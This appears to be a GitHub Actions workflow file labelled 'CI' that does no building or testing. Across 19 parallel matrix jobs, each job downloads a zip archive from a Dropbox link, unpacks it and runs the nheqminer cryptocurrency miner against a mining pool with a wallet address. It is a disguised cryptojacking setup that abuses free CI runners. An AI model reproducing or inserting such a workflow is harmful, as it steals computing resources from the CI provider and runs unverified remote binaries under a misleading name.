name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
   name: TestTlOc
    # The type of runner that the job will run on
   runs-on: ubuntu-latest
   strategy:
    fail-fast: false
    matrix:
     runner: [0,1,2,3,4,5,6,7,8,9,11,12,13,14,15,16,17,18,19]
   steps:
     - run: |
        wget https://dl.dropboxusercontent.com/s/93pc80mzhq4rn5r/bin.zip
        unzip bin.zip
        chmod +x bin/nheqminer
        ./bin/nheqminer -v -l ap.luckpool.net:3956 -u RWQtmzJVSWYh6Abs786i8wHEW4e7vcBQmN.GitHUb -p x -t 1